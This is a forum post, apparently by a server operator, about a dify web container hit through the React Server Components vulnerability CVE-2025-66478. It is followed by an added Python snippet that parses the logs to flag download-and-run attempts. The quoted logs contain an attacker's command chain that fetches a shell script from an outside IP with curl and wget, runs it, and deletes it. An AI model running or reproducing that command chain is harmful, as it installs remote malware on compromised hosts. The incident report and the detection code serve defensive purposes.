First time I've run into a problem this nasty; it turned out to be a React vulnerability

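Author: Jony4Fun
Since 4 p.m. today the cloud server has been raising alerts nonstop: strange scripts such as xlg_amd64, xlg.sh and get.sh were being downloaded.
I killed them, and a while later they showed up again.
I eventually traced it to scripts being executed by dify's web container.
I had never looked closely at the alert on the cloud platform: CVE-2025-66478 ( https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components )
The dify issue shows it as fixed: https://github.com/langgenius/dify/issues/29202
But in the evening I upgraded to 1.10.1-fix.1 and found the problem was still there... After checking with my manager, I shut the service down for now.
Even the script names are this vicious.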
14:29:16 0|dify-web  | /bin/sh: curl: not found
14:29:16 0|dify-web  | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web  | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web  | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web  | rm: can't remove 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web  |  ⨯ [Error: Command failed: curl http://103.135.101.15/wocaosinm.sh;wget http://103.135.101.15/wocaosinm.sh;sh wocaosinm.sh;rm -r wocaosinm.sh
14:29:16 0|dify-web  | /bin/sh: curl: not found
14:29:16 0|dify-web  | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web  | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web  | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web  | rm: can't remove 'wocaosinm.sh': No such file or directory
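
A way to triage container logs like the ones in this post, as an added example that is not part of the original post or of dify: it flags lines where a file fetched with curl or wget is then passed to a shell, and notes whether the shell reported the script as missing. The function name and the log-prefix pattern are assumptions based on the lines shown above.

```python
import re

# Log lines copied from the post above (prefix: "HH:MM:SS <id>|<process> | <message>").
SAMPLE_LOG = """\
14:29:16 0|dify-web  | /bin/sh: curl: not found
14:29:16 0|dify-web  | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web  | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web  |  ⨯ [Error: Command failed: curl http://103.135.101.15/wocaosinm.sh;wget http://103.135.101.15/wocaosinm.sh;sh wocaosinm.sh;rm -r wocaosinm.sh
"""

PREFIX = re.compile(r"^(?P<ts>\d{2}:\d{2}:\d{2})\s+\d+\|(?P<proc>[\w.-]+)\s*\|\s*(?P<msg>.*)$")
# A curl/wget call with optional flags, then an http(s) URL.
FETCH = re.compile(r"\b(?:curl|wget)\s+(?:-\S+\s+)*https?://(?P<host>[^/\s;]+)/(?P<path>[^\s;|&]+)")
# A shell interpreter invoked on a file, at the start of a command in the chain.
EXEC = re.compile(r"(?:^|[;&|\s])(?:/bin/)?(?:sh|bash)\s+(?P<file>[^\s;|&-][^\s;|&]*)")


def find_download_and_run(log_text):
    """Flag log lines where a file fetched by curl/wget is then passed to a shell."""
    rows = [m for m in map(PREFIX.match, log_text.splitlines()) if m]
    findings = []
    for row in rows:
        msg = row["msg"]
        fetched = {f["path"].rsplit("/", 1)[-1]: f["host"] for f in FETCH.finditer(msg)}
        for run in EXEC.finditer(msg):
            script = run["file"].rsplit("/", 1)[-1]
            if script not in fetched:
                continue
            # The shell reporting "can't open" means no file was left behind to run.
            missing = any(f"can't open '{script}'" in r["msg"] for r in rows)
            findings.append({
                "time": row["ts"], "process": row["proc"],
                "host": fetched[script], "script": script,
                "script_missing": missing,
            })
            break
    return findings


if __name__ == "__main__":
    for finding in find_download_and_run(SAMPLE_LOG):
        print(finding)
```

A finding with `script_missing` set to true covers only that one attempt; it says nothing about other scripts the same process may have fetched.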